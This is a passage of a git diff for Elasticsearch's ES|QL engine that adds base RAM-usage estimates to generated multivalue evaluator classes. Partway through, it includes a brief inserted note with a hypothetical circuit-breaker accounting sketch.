diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java
index 5b03f65e27374..946aac9f5d10c 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMaxIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxIntEvaluator.class);
+
   public MvMaxIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java
index 2c9e89a5d3c2a..6874aa6f942b4 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMaxLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxLongEvaluator.class);
+
   public MvMaxLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java
index a94f92f203e9a..314acd60d52b8 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianAbsoluteDeviationDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationDoubleEvaluator.class);
+
   public MvMedianAbsoluteDeviationDoubleEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
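These estimates only matter if something reads them. One plausible consumer, sketched here as an assumption rather than code from this PR, is breaker-based memory accounting when a driver wires up its evaluator tree; addEstimateBytesAndMaybeBreak and addWithoutBreaking are the standard Elasticsearch CircuitBreaker entry points, but the EvaluatorAccounting helper and its label are hypothetical.

import org.elasticsearch.common.breaker.CircuitBreaker;
import org.elasticsearch.compute.operator.EvalOperator;

// Hypothetical helper: reserve the evaluator's base footprint up front and
// release it when the evaluator is closed.
final class EvaluatorAccounting {
  static long reserve(CircuitBreaker breaker, EvalOperator.ExpressionEvaluator evaluator) {
    long bytes = evaluator.baseRamBytesUsed();
    breaker.addEstimateBytesAndMaybeBreak(bytes, "esql evaluator");
    return bytes;
  }

  static void release(CircuitBreaker breaker, long bytes) {
    breaker.addWithoutBreaking(-bytes);
  }
}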
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java
index 4fb12ff939a31..eced397e948c7 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianAbsoluteDeviationIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationIntEvaluator.class);
+
   public MvMedianAbsoluteDeviationIntEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java
index 92c87dd6df912..c437ed6dec234 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianAbsoluteDeviationLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationLongEvaluator.class);
+
   public MvMedianAbsoluteDeviationLongEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java
index 657e98c0e4d01..5d700e70783d4 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianAbsoluteDeviationUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationUnsignedLongEvaluator.class);
+
   public MvMedianAbsoluteDeviationUnsignedLongEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java
index 14ca0c301159f..a8da407463950 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianDoubleEvaluator.class);
+
   public MvMedianDoubleEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java
index 0f3aa297ae521..efe437e5f5959 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianIntEvaluator.class);
+
   public MvMedianIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java
index 1af845514baf9..4e9cec6190e80 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianLongEvaluator.class);
+
   public MvMedianLongEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java
index edc68673d3f4c..1f8deaac9110e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMedianUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianUnsignedLongEvaluator.class);
+
   public MvMedianUnsignedLongEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java
index 3a3f87a518f20..e8dbc5a28f183 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMinBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinBooleanEvaluator.class);
+
   public MvMinBooleanEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java
index a8258c86a3f42..20967a20c9abf 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -18,6 +19,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMinBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinBytesRefEvaluator.class);
+
   public MvMinBytesRefEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -134,6 +137,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java
index 14656910b7c7b..0a5ae6721012b 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMinDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinDoubleEvaluator.class);
+
   public MvMinDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java
index 36c3682dc3c0a..a9f2504cb669f 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMinIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinIntEvaluator.class);
+
   public MvMinIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java
index 0bcfdf0036e52..ef438584a1de4 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMinLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinLongEvaluator.class);
+
   public MvMinLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java
index 11864b18a65d4..c0c8e022e57e5 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import java.util.function.Function;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.Page;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MvPSeriesWeightedSumDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPSeriesWeightedSumDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator block;
@@ -51,6 +54,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += block.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock blockBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java
index 014e9230ce4ed..074b862560272 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import java.util.function.Function;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.Page;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MvPercentileDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPercentileDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator values;
@@ -53,6 +56,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += values.baseRamBytesUsed();
+    baseRamBytesUsed += percentile.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valuesBlock, DoubleBlock percentileBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java
index 63f16bc6f7466..f7c13b7093627 100644
